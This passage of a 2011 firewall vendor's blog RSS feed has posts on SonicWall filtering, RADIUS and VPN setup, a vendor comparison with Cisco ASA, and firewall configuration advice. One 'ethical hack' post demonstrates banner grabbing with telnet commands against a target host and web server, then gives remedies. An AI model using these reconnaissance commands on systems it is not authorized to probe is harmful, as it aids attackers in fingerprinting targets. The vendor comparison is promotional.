<p align="center">&#160;</p><p align="center"><img alt="URL Filtering service " src="/media/upload/image/iframe_sonicwal_urlf.png" /></p><p>&#160;</p><br />As can be seen I've blocked access to the <strong>Not Rated</strong> category, as at the beginning  the obscure site might be unknown.</li>   <li>» Example of &#160;a malware site taken from <strong>Dasient's malware infection library</strong> past week's top malware  infections, the below URL was contained within an iframe, site detected by<a href="http://www.firewalls.com/sonicwall/sonicwall-upgrades-software/sonicwall-content-filtering"> SonicWall's CFS</a>:
<p align="center"><img height="290" width="400" src="/media/upload/image/iframe_sonicwal_cfs.png" alt="SonicWall CFS" /></p></li>   <li>» Additionally  the integrated IPS/Antivirus can block attempts to exploit known  vulnerabilities against browsers, etc. or to download various backdoors etc.<br />For example it was reported that the Geek.com malware attempted to exploit the Help  Center URL Validation Vulnerability CVE-2010-1885<br />The Backdoor Lecna exploited the same  vulnerability, report from SonicWall:<br /><a href="https://www.mysonicwall.com/sonicalert/searchresults.aspx?ev=article&amp;id=246">https://www.mysonicwall.com/sonicalert/searchresults.aspx?ev=article&amp;id=246</a></li>   <li>» Use Geo-IP and Botnet Filters to block access to  possible dangerous countries(like Russia, China) if access to destinations from  such countries is not work related; usually US is a top malware hosting country  though.</li></ul><p>&#160;</p><p align="center"><img height="370" align="absmiddle" width="270" alt="geo ip and botnet filter" src="/media/upload/image/iframe_sonicwal_geo.png" /></p>]]></description>
      <pubDate>Thu, 23 Jun 2011 16:10:33 +0000</pubDate>
    </item>
    <item>
      <title><![CDATA[SonicWALL RADIUS Authentication]]></title><meta http-equiv="X-UA-Compatible" content="IE=8" />
      <link>http://www.firewalls.com/blog/sonicwall_radius/</link>
      <description><![CDATA[<h3>What is SonicWALL RADIUS</h3><p>SonicWALL RADIUS is a method used by your firewall to authenticate usernames and passwords. &#160;When a user tries to authenticate to the network the SonicWALL will send the request to a RADIUS server for verification. &#160;The RADIUS server will return a message back to the SonicWALL stating whether the username and password are correct. &#160;If the user authenticates correctly the firewall will allow the user to login and access the resources requested.</p><h3>Why You Need SonicWALL RADIUS</h3><p>Using your SonicWALL firewall with a RADIUS server can help you centralize and manage &#160;your user's log in information. &#160;A common deployment is to enable the RADIUS services on a Windows Active Directory server so users can use their network username to log in. &#160;Additionally, by have a single location to store username and passwords your users only have to manage one set of credentials to login and access the network.</p><h3>How Do I Set it Up</h3><p>In the following two videos we will show you how to setup a Windows 2008 Active Directory server to accept RADIUS authentication Requests. &#160;In the second video we demonstrate how to configure the SonicWALL to communicate with the RADIUS server.</p> <table width="100%" border="0" cellspacing="1" cellpadding="1">   <tbody><tr>     <td width="120" align="left" valign="top"><a href="http://www.firewalls.com/videos/video/sonicwall-radius-authentication-with-windows-2008-part-1-or-2.html"> <img alt="SonicWALL RADIUS Authentication with Windows 2008 Part 1 or 2" src="http://www.firewalls.com/media/videos/videos/images/thumbnail/sonicwall-radius-authentication-with-windows-2008-part-1-or-2-1308675125.jpg" /> </a></td>     <td align="left" valign="top"><h3><a target="_blank" href="http://www.firewalls.com/videos/video/sonicwall-radius-authentication-with-windows-2008-part-1-or-2.html">Step 1: Windows RADIUS Server Setup</a></h3>     <p>This video will walk you through the process of enabling and configuring the RADIUS server on your Windows 2008 Active Directory Server.</p></td>   </tr>   <tr>     <td width="120" align="left" valign="top"><a href="http://www.firewalls.com/videos/video/sonicwall-radius-authentication-with-windows-2008-part-2-of-2.html"><img alt="SonicWALL RADIUS Authentication with Windows 2008 Part 2 of 2" border="0" src="http://www.firewalls.com/media/videos/videos/images/thumbnail/sonicwall-radius-authentication-with-windows-2008-part-2-of-2-1308675060.jpg" /></a></td>     <td align="left" valign="top"><h3><a target="_blank" href="http://www.firewalls.com/videos/video/sonicwall-radius-authentication-with-windows-2008-part-2-of-2.html">Step 2: Configuring RADIUS on your Firewall</a></h3>     <p>This video will walk you through the process of configuring RADIUS authentication on your SonicWALL firewall.</p></td>   </tr> </tbody></table> <h3>Additional Resources</h3>]]></description>
      <pubDate>Wed, 22 Jun 2011 13:14:12 +0000</pubDate>
    </item>
    <item>
      <title><![CDATA[Banner Grabbing (Ethical Hack)]]></title><meta http-equiv="X-UA-Compatible" content="IE=8" />
      <link>http://www.firewalls.com/blog/banner_grab_ethical_hack/</link>
      <description><![CDATA[<p>Banner Grabbing is a technique used by hackers to extract  information about a host. If successful, it can identify the operating system,  web server and other applications running on the target host.</p> <h2><strong>What is a  Banner?</strong></h2> <p>A banner is simply the text that is embedded with a message  that is received from a host. Usually this text includes signatures of applications  that issue the message. So, they reveal themselves to us.</p> <h2><strong>Background</strong></h2> <table>   <tbody><tr>     <td><img height="133" width="162" alt="Ethical Hack" src="http://www.firewalls.com/media/upload/image/digital_fingerprint.jpg" /></td>     <td>Banner Grabbing is a fingerprinting technique. The term  fingerprint comes from old fashioned police work. It refers to any trace  (finger prints) that could be used for identification purposes.<br /> Banner Grabbing essentially relies on morphed or empty TCP  packets that are sent over to a target machine. The response, which is in most  cases an error, is then analyzed for identification. In some scenarios, a  simple connection request could be exploited. Linux would respond differently  than Windows. Apache and IIS (Internet Information Services) will reply  differently. Valuable information is excavated out of nothing but a harmless  (rather friendly) message.</td>   </tr> </tbody></table>  <h2>How it's  done?</h2> <table>   <tbody><tr>     <td><p>Telnet, Netcat, Nmap and many more tools can be used to pull  this off.<br />       For OS and web server detection, we can grab a banner of  HTTP. Since HTTP works on port 80, the following command would do the trick.</p>       <div style="margin-left:20px; background-color:#FFC; padding:10px"><a href="http://draft.blogger.com/post-create.g?blogID=7253947051673117336">C:\</a>&gt;telnet target_IP 80 <br />         HEAD/HTTP/1.1</div>       <p>As you can see in the example, our request is vague and  invalid. On a good day the result would be something like:</p><div style="margin-left:20px; background-color:#FFC; padding:10px">HTTP/1.1  200 OK<br />         Date: Mon, 20 June 2011 13:00:10 EST<br />         Server: Apache/2.6.01 (Unix) (Red Hat/Linux)<br />         Last-Modified: Thu, 06 Sep 2010 17:55:40 PST<br />         ETag: "2247-12b-449h4bd3"<br />         Accept-Ranges: bytes<br />         Content-Length: 1110<br />         Connection: close<br />         Content-Type: text/html</div>       <br />      And there it is, The OS and the web server.<br />  To grab a banner for SMTP (Send Mail Transfer Protocol):<br />  <div style="margin-left:20px; background-color:#FFC; padding:10px">C:&gt;telnet target_mailserver 25</div><br />       Banners  can also be grabbed from the famous 404 error page. Just messing with the URL  could reveal some valuable information.<br /> Try,<u> </u><a href="http://www.somewebsite.com/anyrandomtext">www.somewebsite.com/anyrandomtext</a> <br /> On an improperly configured system, the 404  page could be an attacker's gold mine.</td>     <td>&#160;</td>   </tr> </tbody></table>  <h2><img height="243" width="493" alt="Banner Grabbing (Ethical Hack)" src="http://www.firewalls.com/media/upload/image/banner_grabber.jpg" /></h2> <h2>Impact</h2> <table>   <tbody><tr>     <td><img height="140" width="154" alt="the ethical hacker network" src="http://www.firewalls.com/media/upload/image/404_error(1).jpg" /></td>     <td>Hackers  grab banners all the time. Although IPs can be logged, hackers usually hide  their real IP before grabbing. If they are successful in grabbing a few banners  they can then use this information to find applications that are weak or have a  security flaw.<br /> Attackers  then focus on exploits that are targeted to the services that you are running.  There are hundreds of services that can be queried for banners and more than  often, a few have flaws or are simply old versions.</td>   </tr> </tbody></table> <h2>Remedy</h2> <p>This  technique reveals critical information that can be devastating. To get rid of  this, first you need to thoroughly analyze what information is leaked.<br />   Set  up your services properly. Default settings are always insecure. Read the  documentation and turn off all the features that are unnecessary. Especially  Apache and IIS.<br /> Turn  off services that you don't need such as telnet. On a windows system go to  Control Panel &gt; Programs and Features &gt; Turn on/off windows features.</p>]]></description>
      <pubDate>Wed, 22 Jun 2011 10:53:47 +0000</pubDate>
    </item>
    <item>
      <title><![CDATA[Comparison of SonicWall E-Class NSA Series and Cisco ASA 5500 Series ]]></title><meta http-equiv="X-UA-Compatible" content="IE=8" />
      <link>http://www.firewalls.com/blog/nsa_e-class_vs_cisco_asa5500/</link>
      <description><![CDATA[<h1>Brief Comparison of SonicWall E-Class NSA Series and Cisco ASA 5500 Series protection features for the Web 2.0 era</h1> 
<table>   <tbody><tr>     <td><img align="left" alt="" src="http://www.firewalls.com/media/upload/image/sonicwall_ngfw.png" /></td>     <td><a href="http://www.firewalls.com/sonicwall/sonicwall-firewall/sonicwall-e-class-series">SonicWall E-Class</a> Network Security Appliance (<a href="http://www.firewalls.com/sonicwall/sonicwall-firewall/sonicwall-e-class-series">NSA</a>) Series are<a href="http://www.firewalls.com/sonicwall/sonicwall-firewall/sonicwall-e-class-series"> Next Generation Firewalls</a> (<a href="http://www.firewalls.com/sonicwall/sonicwall-firewall/sonicwall-e-class-series">NGFW</a>). They offer integrated Applications Identification and Control, Antivirus Inspection, Content Filtering, IPS, Encrypted Traffic Inspection(like HTTPS), URL filtering or Geo-IP filtering service.</td>   
</tr>   <tr>     <td><img align="left" alt="" src="http://www.firewalls.com/media/upload/image/cisco_asa_utm.png" /></td>     <td>Cisco Adaptive Security Appliance (ASA) 5500 series are UTMs, featuring a first generation firewall, Botnet Traffic Filter; IPS or Content and URL Filtering + Malware Inspection are available through services modules. Offer limited applications control; Cisco has announced plans to add application visibility into its ASA series with the new SecureX security architecture.</td>   </tr> </tbody></table> <h2><a href="http://www.firewalls.com/sonicwall/sonicwall-firewall/sonicwall-e-class-series">SonicWall E-Class NSA Series</a></h2> 
<p>The <a href="http://www.firewalls.com/sonicwall/sonicwall-firewall/sonicwall-e-class-series">SonicWall NGFW</a> uses a centric logic in creating filtering policies, user based policies rather than IP address based ones.  Focuses on applications and applications' features granular control meaningless of port and protocol, out-of-the-box many applications being supported(custom control is also present); for example can differentiate between streaming video types like YouTube and Business Video Conference or block file transfers from IM.<br /> 
Decrypts and inspects encrypted traffic(like HTTPS).</p> <p align="center"><img alt="" src="http://www.firewalls.com/media/upload/image/sonicwall.png" /></p> <p><strong><a href="http://www.firewalls.com/sonicwall/sonicwall-firewall/sonicwall-e-class-series">SonicWall E-Class NSA</a> at work:</strong></p> 
<ul style="margin-left:25px">   <li>» Allow and prioritize productivity related web applications like Salesforce.com, SAP, VoIP</li>   <li>» Control unproductive but acceptable ones like Facebook(block features of it like games), Live View or Twitter.</li>   <li>» Prohibit unneeded applications like BitTorrent or appleJuice.</li></ul>   <p><a href="http://www.firewalls.com/sonicwall/sonicwall-firewall/sonicwall-e-class-series">SonicWall E-Class NSA series</a> provide great visibility into the traffic flow, real-time picture of applications/protocols used by users through comprehensive integrated monitoring features; also bandwidth can be controlled and monitored per applications or users.</p> 
<p><img alt="" src="http://www.firewalls.com/media/upload/image/sonicwall_flow_mon.png" /> &#160;</p> <h2>Cisco ASA 5500</h2> <p>The Cisco ASA UTM(as writing latest software version 8.4) uses the first generation firewalls logic in creating filtering policies, IP address based ones. Users are rather configured through the AAA feature.   Focuses on port filtering and protocol inspection, some applications can be controlled by signatures through the Modular Policy Framework (MPF); in many cases administrators need to figure it out application signatures and use regular expressions; process susceptible to evasion/bypass by savvy users. <img alt="" src="http://www.firewalls.com/media/upload/image/cisco_asa.png" /></p> <p><img align="right" alt="" src="http://www.firewalls.com/media/upload/image/cisco_asa_ssm.png" />Advanced protection services are offered rather disjointed; for example IPS protection is available through the AIP-SSM, <span style="mso-spacerun:yes">&#160;</span>AIP-SSC or IPS SSP modules; anti-malware, content and URL filtering through the CSC-SSM module. And only one such module is supported at a time on a single appliance; if both IPS and content inspection/antivirus/URL filtering functionalities are required, another appliance is needed.&#160;</p> <table>   <tbody><tr>     <td><img height="78" align="left" width="75" src="http://www.firewalls.com/media/upload/image/cisco_asa_lim_vis.png" alt="" /></td>     <td>Limited visibility into the traffic flow out-of-the-box; greater visibility might be achievable with NSEL and Scrutinizer, not 100% live. <br /> Encrypted traffic like HTTPS is opaque, Cisco ASA cannot inspect it; usually Cisco ASA is paired with a solution like the one offered by Websense to address this.</td>   </tr> </tbody></table>  <h2>Conclusion</h2> <p>As can be seen from above the <a href="http://www.firewalls.com/sonicwall/sonicwall-firewall/sonicwall-e-class-series">SonicWall NGFW</a> clearly has the edge over the Cisco ASA providing greater security and control over the data flow due to its advanced architecture and integrated inspection features, Cisco hasn't unveiled yet its SecureX security architecture.</p>]]></description>
      <pubDate>Fri, 17 Jun 2011 17:16:57 +0000</pubDate>
    </item>
    <item>
      <title><![CDATA[Building a SonicWALL to SonicWALL VPN]]></title><meta http-equiv="X-UA-Compatible" content="IE=8" />
      <link>http://www.firewalls.com/blog/sonicwall-to-sonicwall-vpn/</link>
      <description><![CDATA[<p>&#160;Building a SonicWALL to SonicWALL VPN tunnel has many advantages. &#160;This includes accessing shared files, folders, and network printers. &#160;Additionally, you can run company applications such as CRM, accounting and other business process software applications.</p> <h3>Tips on SonicWALL to SonicWALL VPNs</h3> <p>SonicWALL VPN tunnels have a long list of configuration settings that can be daunting. &#160;Here are a few key settings you should know:</p> <p>1)<strong> Main Mode or Aggressive Mode</strong> - If both firewalls have static WAN IP addresses then choose main mode. &#160;If one location has a dynamic IP address then choose aggressive mode.<br /> 2) <strong>Encryption Level</strong> - you can choose between DES, which is least secure but fast or AES-256, which is slower but much more secure.<br /> 3) <strong>Enable Keep Alive</strong> - if you are using an aggressive mode VPN tunnel you should enable this option to help keep the VPN tunnel up and runng.</p> <h3>Pre-Installation Checklist</h3> <p>Before you begin building the SonicWALL VPN tunnel you will need to know:</p><p>» Make sure at least one location has a static IP address.<br />»&#160;Ensure both network locations are using a different IP addressing scheme.<br />» Have a plan on whether you will allow full access across the VPN or need to limit access to resources.<br />» Install the latest firmware available for your SonicWALL.<br />» ALWAYS backup your SonicWALL configuration before and after you make changes.</p> <h3>Setting up the SonicWALL to SonicWALL VPN</h3> <p>To assist you with setting up the SonicWALL VPN we have assembled some easy to follow, step-by-step videos. &#160;These videos will explain each of the VPN settings along the way to help ensure you are able to setup the SonicWALL VPN correctly.&#160;</p> <table width="100%" border="0" cellspacing="10" cellpadding="10">   <tbody><tr>     <td width="125"><img width="125" target="_blank" alt="" src="http://www.firewalls.com/media/videos/videos/images/file.png" /></td>     <td><h3><a title="Site to Site VPN Using Static WAN IP Addresses" target="_blank" href="http://www.firewalls.com/videos/video/site-to-site-vpn-using-static-wan-ip-addresses.html">Site to Site VPN Using Static WAN IP Addresses</a></h3>     Learn how to setup a VPN network between two SonicWALL firewalls using static / fixed WAN IP addresses.</td>   </tr>   <tr>     <td width="125"><img width="125" target="_blank" alt="" src="http://www.firewalls.com/media/videos/videos/images/vpn-agressive.png" /></td>     <td><h3><a title="Site to Site VPN Using A Dynamic WAN IP Address" target="_blank" href="http://www.firewalls.com/videos/video/site-to-site-vpn-using-a-dynamic-wan-ip-address.html">Site to Site VPN Using A Dynamic WAN IP Address - Agressive Mode</a></h3>     Learn how to setup a site-to-site VPN between two SonicWALLs using aggressive mode. This is a common VPN tunnel where the main office has a static / fixed public IP address and the remote office is using a dynamic IP address (e.g. from a cable or DSL ISP provider.)</td>   </tr>   <tr>     <td width="125"><img width="125" target="_blank" alt="" src="http://www.firewalls.com/media/videos/videos/images/vpns.jpg" /></td>     <td><h3><a title="Setting up a Site-to-Site VPN Tunnel - Main Mode" target="_blank" href="http://www.firewalls.com/videos/video/setting-up-a-site-to-site-vpn-tunnel.html">Setting up a Site-to-Site VPN Tunnel - Main Mode</a></h3>     Learn how to setup a site-to-site (or network to network) VPN tunnel using the SonicWALL firewall VPN features.</td>   </tr> </tbody></table> <p>&#160;</p>]]></description>
      <pubDate>Wed, 15 Jun 2011 01:39:06 +0000</pubDate>
    </item>
    <item>
      <title><![CDATA[Things to Remember while Configuring Next Generation Firewalls]]></title><meta http-equiv="X-UA-Compatible" content="IE=8" />
      <link>http://www.firewalls.com/blog/how_to_configure_your_firewall/</link>
      <description><![CDATA[<p>Next Generation Firewalls may have a lot to offer, but when  misconfigured will fail to perform.</p> <p>Along with the benefits of granular control over users' applications,  NGFW can go a long way in mitigating security risks; for example it's not  sufficient for an attacker to sit on a 0-day vulnerability, it must be able to  exploit it and benefit from this exploitation.</p> <p>There are two main intersecting categories of risk for (egress)  filtering considerations, a category that includes loss of work productivity or  bandwidth abuse due to employee misconduct and one associated with attacks  prevention.</p> <h2>Let's take a look.</h2> <table>   <tbody><tr>     <td style="text-align: center;">&#160;<img src="http://www.firewalls.com/media/upload/image/traffic-inspection.jpg" alt="Enable encrypted traffic inspection" style="width: 85px; height: 111px;" /></td>     <td>Enable encrypted traffic inspection(like HTTPS). While this gives you control  over users' traffic inside the SSL tunnel, blocks by default (unwanted)  applications using non-SSL traffic(like UltraSurf) and makes the firewall a SSL  enforcer(allows only strong cipher suites or SSL/TLS protocols to be used,  verifies servers' certificates, trusted root CAs control), also makes the  attackers to raise their game; remember the Aurora Operation where the hackers  setup the covert channel to the command and control server over TCP port 443  not using the SSL protocol.</td>   </tr>   <tr>     <td style="text-align: center;">&#160;<img src="http://www.firewalls.com/media/upload/image/url_filtering.jpg" alt="URL filtering" style="width: 75px; height: 99px;" /></td>     <td>When doing URL filtering, instead of the regular approach(blacklist  dangerous or unwanted destinations), consider the whitelist one: allow strictly  the needed category destinations. This prevents users from accessing some  obscure sites(or even unneeded popular ones) and attackers of using such sites  as covert channel destinations or drive-by download points. Furthermore, when  possible, disable scripts(like Java, strip script tags) for all web sites  except for a list of sites, preventing malicious scripts to be served within  web pages in an attempt to exploit 0-day browsers vulnerabilities.</td>   </tr>   <tr>     <td style="text-align: center;">&#160;<img src="http://www.firewalls.com/media/upload/image/firewalls_rule.jpg" alt="rules based on applications " style="width: 68px; height: 87px;" /></td>     <td>Depending on the firewall, create allow rules based on applications  rather than allow rules per protocol plus block rules/signatures for unwanted  applications or application features. Furthermore, apply user authentication on  the rules so that users to be allowed to access only what's needed.</td>   </tr>   <tr>     <td style="text-align: center;">&#160;<img src="http://www.firewalls.com/media/upload/image/stop_ftp.jpg" alt="restrict allowed FTP " style="width: 73px; height: 80px;" /></td>     <td>It's not all about TCP ports 80 and 443, consider the recent RSA  breach, the attackers siphoned out data using FTP; restrict allowed FTP  destinations and control the FTP protocol usage(don't allow FTP uploads if  unneeded); if possible apply antivirus inspection over FTP traffic and block  the download/upload of files that cannot be scanned(like encrypted archives).  Similar for other stuff(for emails consider stripping certain attachments).</td>   </tr>   <tr>     <td>&#160;<img src="http://www.firewalls.com/media/upload/image/bandwidth_monitor.jpg" alt="Perform bandwidth allocation and monitoring" style="width: 81px; height: 89px;" /></td>     <td>Perform bandwidth allocation and monitoring; along with the advantage  of allocating bandwidth properly and having a (live) picture of the users and  their connections bandwidth utilization, you can detect attempts of siphoning  out data; you might remember the old Joint Strike Fighter project incident  where hackers were reported to steal terabytes of data.<br /> Use virtual patching with the integrated IPS to reduce the  vulnerability window between vulnerability disclosure and patch deployment.  It's not uncommon to see unpatched browsers vulnerabilities actively exploited.</td>   </tr>   <tr>     <td style="text-align: center;">&#160;<img src="http://www.firewalls.com/media/upload/image/virtual_patch.jpg" alt="Use virtual patching " style="width: 37px; height: 54px;" /></td>     <td>While thinking big and aiming high(application control), don't forget  the little guy; the late TCP split handshake issue (un)surprisingly showed  weaknesses in the way some firewalls perform stateful packet inspection(either due  to limitations or relaxed configurations).</td>   </tr> </tbody></table>]]></description>
      <pubDate>Wed, 15 Jun 2011 01:01:13 +0000</pubDate>
    </item>
  </channel>
</rss>

